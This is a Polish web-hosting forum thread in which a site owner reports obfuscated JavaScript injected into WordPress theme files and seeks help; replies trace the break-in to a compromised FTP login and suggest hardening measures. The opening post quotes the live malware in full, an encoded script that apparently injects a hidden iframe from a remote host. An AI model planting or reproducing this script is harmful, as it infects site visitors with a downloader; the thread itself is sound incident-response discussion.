Skocz do zawartości
elroy

Wordpress - dopisanie kodu do plików template

Polecane posty

Witam

Dziś około 17.11 do plików header oraz footer w katalogu template wordpress został dopisany kod JS (poniżej)

W logach o tej godzinie nie znalazłem nic ciekawego. Uprawnienia dla zarażonych plików 0644 (dla użytkownika tomek:tomek). Uprawnienia dla katalogu: 0755.

Użytkownicy zgłosili JS:Downloader-AWQ [Trj]

Gdzie szukać dziury ?

Dzięki za pomoc!

 

<script>String.prototype.test="h";for(i in'')if(i=='test')m=''[i];var ss="";aa=document.createTextNode(m+"a"+"rC"+"ode");s=String["fr"+"omC"+aa['nod'+'eVa'+'lue']];d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){h=d2-d;} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,95-h,115-h,101-h,48-h,48-h,52-h,55-h,99-h,98-h,105-h,106-h,100-h,95-h,120-h,110-h,44-h,97-h,46-h,107-h,44-h,106-h,103-h,45-h,100-h,109-h,112-h,115-h,107-h,44-h,110-h,102-h,110-h,61-h,114-h,110-h,59-h,49-h,98-h,50-h,99-h,52-h,54-h,47-h,47-h,100-h,52-h,95-h,98-h,47-h,48-h,48-h,98-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,95-h,115-h,101-h,48-h,48-h,52-h,55-h,99-h,98-h,105-h,106-h,100-h,95-h,120-h,110-h,44-h,97-h,46-h,107-h,44-h,106-h,103-h,45-h,100-h,109-h,112-h,115-h,107-h,44-h,110-h,102-h,110-h,61-h,114-h,110-h,59-h,49-h,98-h,50-h,99-h,52-h,54-h,47-h,47-h,100-h,52-h,95-h,98-h,47-h,48-h,48-h,98-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Może syf wyszedł od Ciebie z kompa po FTP? Przez zapisane hasło w kliencie.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Może syf wyszedł od Ciebie z kompa po FTP? Przez zapisane hasło w kliencie.

 

Początkowo miałem już napisać, że to nie możliwe, ale sprawdziłem logi proftpd. Ciekawa sprawa.... Wygląda na to, że hasło było znane osobie logującej się. Sprawdziłem jakie pliki zostały modyfikowane i tylko te z wordpressa. Automat ?

 

Aug 22 18:06:48 elroy proftpd[23392] (::ffff:109.253.111.228[::ffff:109.253.111.228]): FTP session opened.

Aug 22 18:06:49 elroy proftpd[23392] (::ffff:109.253.111.228[::ffff:109.253.111.228]): no such user 'u64248754'

Aug 22 18:06:49 elroy proftpd[23392] (::ffff:109.253.111.228[::ffff:109.253.111.228]): USER u64248754: no such user found from ::ffff:109.253.111.228 [::

ffff:109.253.111.228] to ::ffff:80.xx.xx.xx

Aug 22 18:06:49 elroy proftpd[23392] (::ffff:109.253.111.228[::ffff:109.253.111.228]): FTP session closed.

Aug 22 18:07:18 elroy proftpd[23393] (::ffff:109.253.111.228[::ffff:109.253.111.228]): FTP session opened.

Aug 22 18:07:18 elroy proftpd[23393] (::ffff:109.253.111.228[::ffff:109.253.111.228]): no such user 'u64248754'

Aug 22 18:07:18 elroy proftpd[23393] (::ffff:109.253.111.228[::ffff:109.253.111.228]): USER u64248754: no such user found from ::ffff:109.253.111.228 [::

ffff:109.253.111.228] to ::ffff:80.xx.xx.xx

Aug 22 18:07:18 elroy proftpd[23393] (::ffff:109.253.111.228[::ffff:109.253.111.228]): FTP session closed.

Aug 22 18:08:10 elroy proftpd[23400] (::ffff:109.253.111.228[::ffff:109.253.111.228]): FTP session opened.

Aug 22 18:08:11 elroy proftpd[23400] (::ffff:109.253.111.228[::ffff:109.253.111.228]): USER tomek: Login successful.

Aug 22 18:08:11 elroy proftpd[23400] (::ffff:109.253.111.228[::ffff:109.253.111.228]): Preparing to chroot to directory '/home/tomek'

Edytowano przez elroy (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kamikadze

Na Joomli jest to samo. Do templatek dopisywane są skrypty JS.

 

Spróbuj ustawić sobie na katalog administracyjny hasło (htpasswd)

 

Możesz też spróbować usunąć prawa na jakieś bez możliwości zapisu (na 90% ci się wysypie kod, ale można spróbować).

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

W joomli i WP można chyba zapisać hasło w panelu administracyjnym. Więc może jeszcze jest jakiś sposób na wyciągnięcie go :)

Dodatkowo logowanie do ftp nie jest szyfrowane.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kamikadze

A hasło masz jakieś długie i specjalne do FTP i do panelu administratora? Bo może wystarczy jakaś captcha lub logowanie do admina tylko z Twojego IP?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Zrób sobie hasło+jakiś wymyślony login (nie admin etc.) na poziomie http do /wp-admin/

Ja osobiście używam SFTP, od dwóch lat nikt mi sie nie włamał do niczego, hasło mam 12+ znaków, dużemałe litery i cyfry, tak, oczywiście z generatora,

Haseł też nie powinno się zapisywać w klientach, lecz jak dla mnie jest to co najmniej uciążliwe przy moich hasłach,

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Może to być automat, a może po prostu miałeś szczęście i twoje hasło wraz z loginem tomek stanowiło słownikową parę.

Tak czy inaczej, wskazana jest zmiana hasełek na dosyć trudne.

Dodatkowo (zakładam, że skoro masz logi ftp, to masz jakiś tam dostęp do konsoli) możesz z poziomu root'a wykonać polecenie

chattr +i nazwapliku

na plikach, których automatyczna modyfikacja była by niewskazana (pliki szablonów, wp-config.php, index.php).

Wada jest tylko taka, że przestanie [z racji logiki] działać autoupdate wordpressa, no i nawet root nie zmodyfikuje tych plików bez zdjęcia flagi immutable (chattr -i).

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×